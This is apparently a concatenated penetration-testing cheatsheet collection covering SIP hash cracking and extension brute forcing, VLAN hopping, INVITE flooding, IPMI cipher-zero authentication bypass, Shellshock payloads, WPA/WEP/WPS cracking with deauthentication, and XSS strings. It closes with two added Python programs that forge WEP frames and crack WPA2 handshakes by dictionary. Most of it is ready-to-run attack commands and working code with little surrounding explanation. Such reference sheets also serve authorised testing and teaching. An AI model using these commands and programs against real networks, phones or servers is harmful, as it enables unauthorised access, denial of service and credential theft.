./sipdump -i eth0
./sipdump -i eth0 auth.txt
./sipdump -p /root/registration.pcap auth.txt


[+] Cracking SIP Digest response hashes

./sipcrack -w sipass.txt auth.txt


[+] Brute forcing SIP Accounts

./svcrack.py -u200 -d wordlist.txt 192.168.1.104
./svcrack.py -u200 -r100000-999999 192.168.1.104


VLAN Hopping
------------

modprobe 8021q

[+] VoIP Hopper

./voiphopper -i eth0 -c 0
./voiphopper -i eth0 -v 20


Denial Of Service
-----------------

[+] Inviteflood - This tool can be used to flood a target with INVITE requests; it can be used against SIP gateways/proxies and SIP phones.

./inviteflood eth0


Attacking VoIP Using Metasploit
-------------------------------

[+] Scanning SIP Enabled Devices
use auxiliary/scanner/sip/options

[+] Enumerating SIP extensions / Usernames
use scanner/sip/enumerator
set RHOSTS 192.168.1.104
set MINEXT 100
set MAXEXT 500
set PADLEN 3

[+] Spoofing Caller ID auxiliary
use voip/sip_invite_spoof
--------------------------------------------------------------------------------
/Cheatsheet_Vlans.txt:
--------------------------------------------------------------------------------
Configure an Ethernet interface as a VLAN trunk
---------------------------------------------------

Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3.
[+] First install the vlan package if it is not already present:

apt-get install vlan

[+] Turn off network-manager

sudo stop network-manager

[+] Configuring interfaces

vconfig add eth0 (you may get a warning message on the first one)
example: vconfig add eth0 101

ifconfig eth0. /24 up
example: ifconfig eth0.101 192.168.1.10/24 up

ifconfig eth0.

Note: If there are any issues, run ifconfig eth0 0.0.0.0 up
Note: Specify the interface when scanning with nmap (nmap -e eth0.101)
Note: You will probably need to add individual routes for each VLAN if you want to communicate between VLANs; don't rely on your default gateway. (route add)

[+] Remove Configuration
vconfig rem eth0.101
--------------------------------------------------------------------------------
/Cheatsheet_VulnVerify.txt:
--------------------------------------------------------------------------------
Verify Various Vulnerabilities
------------------------------

[+] IPMI Cipher Suite Zero Authentication Bypass:
http://www.tenable.com/plugins/index.php?view=single&id=68931

Tools required:
ipmitool
freeipmi-tools

ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list

# Specifying Cipher Suite Zero
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor


[+] Bash Remote Code Execution (Shellshock)
http://www.tenable.com/plugins/index.php?view=single&id=77823

x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
x: () { :;}; echo "Hacked" > /var/www/hacked.html


[+] DNS Server Cache Snooping Remote Information Disclosure
http://www.tenable.com/plugins/index.php?view=single&id=12217

Nmap Script: dns-cache-snoop
http://nmap.org/nsedoc/scripts/dns-cache-snoop.html

nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}'


[+] IP Forwarding Enabled
http://www.tenable.com/plugins/index.php?view=single&id=50686

Nmap Script: ip-forwarding
http://nmap.org/nsedoc/scripts/ip-forwarding.html

sudo nmap -sn --script ip-forwarding --script-args='target=www.example.com'

Alternatives:
- Set the VM's default gateway to the victim IP address and attempt to route elsewhere.
- http://pentestmonkey.net/tools/gateway-finder

--------------------------------------------------------------------------------
/Cheatsheet_WindowsCommandLine.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jivoi/Cheatsheets/9bc195d4cc05728c4ee29312124ac57ed54bb160/Cheatsheet_WindowsCommandLine.pdf
--------------------------------------------------------------------------------
/Cheatsheet_WirelessTesting.txt:
--------------------------------------------------------------------------------
WPA2 PSK attack with aircrack-ng suite.
---------------------------------------

ifconfig wlan1                                              # check wireless IFace
sudo airmon-ng check kill                                   # kill issue causing processes
sudo airmon-ng start wlan1                                  # start monitor mode
sudo airodump-ng wlan1mon                                   # start capturing
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon   # deauthenticate the client
sudo aircrack-ng output-01.cap dict                         # crack the passphrase


WPA PSK attack with aircrack-ng suite.
--------------------------------------

Place your wireless card into Monitor Mode
airmon-ng start wlan0

Detect all available wireless APs and clients
airodump-ng mon0

Setting adapter channel
iwconfig mon0 channel

Capturing the four-way handshake
airodump-ng --channel --bssid --write capture mon0

You can capture the handshake passively (it takes time) or de-authenticate a client.

De-authentication attack
aireplay-ng --deauth 3 -a -c mon0

Deauth every client - aireplay-ng -0 5 -a mon0

Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap

Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap


WEP attack with aircrack-ng suite.
----------------------------------

Place your wireless card into Monitor Mode
airmon-ng start wlan0

Detect all available wireless APs and clients
airodump-ng mon0

Setting adapter channel
iwconfig mon0 channel

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

aircrack-ng -b (bssid) (file name-01.cap)


Rogue Access Point Testing
--------------------------

# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0

root@backbox:/home/backbox# ifconfig wlan1 down
root@backbox:/home/backbox# iw reg set BO
root@backbox:/home/backbox# ifconfig wlan1 up
root@backbox:/home/backbox# iwconfig wlan1 channel 13
root@backbox:/home/backbox# iwconfig wlan1 txpower 30
root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto


Reaver
------

airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1

(-S uses small Diffie-Hellman keys to speed up the exchange, --no-nacks stops reaver sending NACKs on out-of-order packets, -d7 waits 7 seconds between PIN attempts, -c 1 locks to channel 1. Many APs lock WPS after a burst of failed PINs; increase the delay if reaver reports lockouts.)


Pixie WPS
---------

airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1

(airmon-ng check lists processes that interfere with monitor mode; --wps adds a WPS column to the airodump-ng output; -K 1 runs the pixie-dust attack, which recovers the PIN offline from a single WPS exchange when the AP uses weak nonces, instead of brute-forcing PINs online.)


Wireless Notes
--------------

Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for the integrity check (ICV). The 24-bit IV is prepended to the shared key, so keystreams repeat and statistical attacks on the RC4 key (FMS/PTW) recover the key from enough IVs.
- Attack:
  Sniff an ARP packet, then replay it to get many encrypted replies with different IVs; aircrack-ng recovers the key statistically from those IVs.
- Remediation:
  Use WPA2. A longer WEP key does not help, since the attack scales with the number of captured IVs, not the key length.

Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP), still RC4 based, with the Michael Message Integrity Check
- Attack:
  Uses a four-way handshake, and if that handshake can be captured, a dictionary attack can be mounted against it to find the Pre-Shared Key (and so the Pairwise Master Key) for the Access Point and client Station.
- Remediation:
  Use long, random passphrases. The PMK is derived from the passphrase with PBKDF2, so an attacker holding the handshake is limited only by how guessable the passphrase is.

Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES) in CCMP mode
- Attack:
  Same as WPA-PSK: capture the four-way handshake and mount a dictionary attack to find the Pairwise Master Key for the Access Point and client Station. AES itself is not attacked; the weakness is a guessable passphrase.
- Remediation:
  WPA2-Enterprise (802.1X/EAP with per-user credentials, so there is no shared passphrase to guess), or a long random PSK.
--------------------------------------------------------------------------------
/Cheatsheet_XSS.txt:
--------------------------------------------------------------------------------
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
>">'>
xxs link
xxs link
--------------------------------------------------------------------------------
/Cheatsheet_scp.txt:
--------------------------------------------------------------------------------
[+] Secure Copy (scp) Cheatsheet
--------------------------------

[>] Copy remote file to local host (the remote side needs a path after the colon):

$ scp your_username@192.168.0.10:(remote file) /some/local/directory

[>] Copy local file to remote host:

$ scp (local file) your_username@192.168.0.10:/some/remote/directory

[>] Copy local directory to remote directory:

$ scp -r (local directory) your_username@192.168.0.10:/some/remote/directory/

[>] Copy a file from one remote host to another:

$ scp your_username@(host1):/some/remote/directory/foobar.txt your_username@(host2):/some/remote/directory/

[>] Improve scp performance by choosing a faster cipher:

$ scp -c aes128-gcm@openssh.com your_username@192.168.0.10:/some/remote/directory

The old advice of "-c blowfish" no longer works: OpenSSH removed the blowfish-cbc cipher (together with arcfour and CAST) in version 7.6, and as a 64-bit block cipher it should not be used anyway. On hardware with AES instructions, aes128-gcm@openssh.com or aes128-ctr is both faster and safe. Check what the remote accepts with "ssh -Q cipher".
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
Cheatsheets
===========

Penetration Testing/Security Cheatsheets that I have collated over the years.
--------------------------------------------------------------------------------
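The Wireless Notes above describe WEP as "RC4 w/ CRC32 for integrity check". The following is an added example (not code from the cheatsheets or from the aircrack-ng project) showing the concrete consequence of using a CRC as an integrity check: CRC-32 is linear, so an attacker who has captured one WEP frame can flip chosen plaintext bits and patch the ICV without knowing the key or the keystream. The key, IV and HTTP request are constructed for the demo; the frame layout (IV || key id || RC4(plaintext || ICV)) follows WEP, while the 13-byte key and the frame contents are assumptions.

```python
"""WEP bit-flipping: CRC-32 is affine over GF(2), so an attacker can modify a
captured WEP frame and fix up the ICV with no key material. Constructed demo."""
import os
import struct
import zlib
from typing import Optional, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with the 24-bit IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32(data: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, appended before encryption."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: IV(3) || key id(1) || RC4(IV || key, plaintext || ICV)."""
    assert len(iv) == 3
    return iv + b"\x00" + rc4(iv + key, plaintext + crc32(plaintext))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Return the plaintext if the ICV verifies, else None (frame is dropped)."""
    iv, body = frame[:3], frame[4:]
    data = rc4(iv + key, body)
    plaintext, icv = data[:-4], data[-4:]
    return plaintext if crc32(plaintext) == icv else None


def forge_wep_frame(frame: bytes, delta: bytes) -> bytes:
    """Bit-flip attack (Borisov, Goldberg, Wagner 2001): XOR `delta` into the
    plaintext of a captured frame and patch the ICV, using no key material.
    Because crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros), the ICV correction
    depends only on delta and its length, never on the unknown plaintext."""
    body = bytearray(frame[4:])
    n = len(body) - 4                      # payload length without the ICV
    assert len(delta) == n
    icv_fix = bytes(a ^ b for a, b in zip(crc32(delta), crc32(bytes(n))))
    mask = delta + icv_fix                 # XOR pattern for payload || ICV
    for i, m in enumerate(mask):
        body[i] ^= m                       # RC4 is XOR, so this flips plaintext bits
    return frame[:4] + bytes(body)


# Constructed sample traffic: the attacker knows (or guesses) these bytes differ.
ORIGINAL = b"GET /login?user=alice&admin=0 HTTP/1.0"
TARGET = b"GET /login?user=alice&admin=1 HTTP/1.0"


def demo() -> Tuple[Optional[bytes], Optional[bytes]]:
    """Encrypt ORIGINAL under a key the attacker never sees, forge TARGET,
    and return what the receiver decrypts for (captured, forged)."""
    key = os.urandom(13)                   # 104-bit WEP key, hidden from the attacker
    iv = os.urandom(3)
    frame = wep_encrypt(key, iv, ORIGINAL)
    delta = bytes(a ^ b for a, b in zip(ORIGINAL, TARGET))
    forged = forge_wep_frame(frame, delta)
    return wep_decrypt(key, frame), wep_decrypt(key, forged)


if __name__ == "__main__":
    print(demo())
```

The receiver accepts the forged frame because the ICV is consistent with the modified plaintext; a keyed MAC (Michael in TKIP, CBC-MAC in CCMP) is what WPA/WPA2 added to stop exactly this.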
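The WPA/WPA2 notes above say that a captured four-way handshake allows a dictionary attack on the Pairwise Master Key; this added example (not aircrack-ng's code, nor anything from the cheatsheets) shows what that attack actually computes. It derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), expands it to the PTK with the 802.11i PRF-512 over the two MAC addresses and nonces, and checks each candidate by recomputing the MIC of EAPOL-Key message 2 with the KCK. The SSID, passphrase, MAC addresses and fixed nonces are constructed so the run is deterministic; a real capture would supply them from the pcap.

```python
"""WPA/WPA2-PSK handshake dictionary attack, the computation behind
`aircrack-ng -w wordlist capture.cap`. Constructed demo data."""
import hashlib
import hmac
from typing import Iterable, Optional

# EAPOL(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32)
# + key IV(16) + RSC(8) + key ID(8) = 81 bytes before the 16-byte MIC field.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK mapping: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs || min/max of nonces).
    The first 16 bytes of the PTK are the KCK used for the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        msg = b"Pairwise key expansion" + b"\x00" + data + bytes([i])
        out += hmac.new(pmk, msg, hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes, version: int = 2) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed. Key descriptor
    version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) uses HMAC-SHA1
    truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    digestmod = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digestmod).digest()[:16]


def crack_handshake(wordlist: Iterable[str], ssid: str, aa: bytes, spa: bytes,
                    anonce: bytes, snonce: bytes, eapol: bytes,
                    version: int = 2) -> Optional[str]:
    """Dictionary attack: the first candidate whose derived KCK reproduces the
    captured MIC is the passphrase. Each guess costs one PBKDF2 (4096 HMACs),
    which is the only thing limiting the attacker's guess rate."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = prf512(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol, version), captured_mic):
            return candidate
    return None


def build_eapol_msg2(kck: bytes, snonce: bytes, version: int = 2) -> bytes:
    """Constructed EAPOL-Key message 2 (supplicant -> AP) carrying SNonce and a
    valid MIC, standing in for the frame airodump-ng would have captured."""
    key_info = 0x0100 | 0x0008 | version          # MIC set, pairwise, descriptor version
    body = (b"\x02"                                # descriptor type: RSN (802.11i)
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")              # key length (CCMP)
            + (1).to_bytes(8, "big")               # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)      # key IV, RSC, key ID (unused here)
            + bytes(16)                            # MIC placeholder
            + (0).to_bytes(2, "big"))              # key data length
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key
    return eapol[:MIC_OFFSET] + eapol_mic(kck, eapol, version) + eapol[MIC_OFFSET + 16:]


def demo(wordlist: Optional[Iterable[str]] = None) -> Optional[str]:
    """Simulate a captured handshake for a constructed network and crack it."""
    ssid = "CorpWifi"                              # constructed SSID
    true_passphrase = "Summer2014!"                # constructed weak PSK
    aa = bytes.fromhex("001122334455")             # AP MAC (constructed)
    spa = bytes.fromhex("66778899aabb")            # client MAC (constructed)
    anonce = bytes(range(32))                      # fixed nonces for a deterministic run
    snonce = bytes(range(32, 64))
    kck = prf512(pmk_from_passphrase(true_passphrase, ssid), aa, spa, anonce, snonce)[:16]
    eapol = build_eapol_msg2(kck, snonce)
    if wordlist is None:
        wordlist = ["password", "letmein", "Summer2014!", "correcthorse"]
    return crack_handshake(wordlist, ssid, aa, spa, anonce, snonce, eapol)


if __name__ == "__main__":
    print(demo())
```

Nothing here touches AES: the cracker only needs the two MACs, the two nonces and one MIC-bearing EAPOL frame, which is why the remediation is a passphrase that is not in any wordlist (or WPA2-Enterprise, where no shared passphrase exists), not a stronger cipher.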
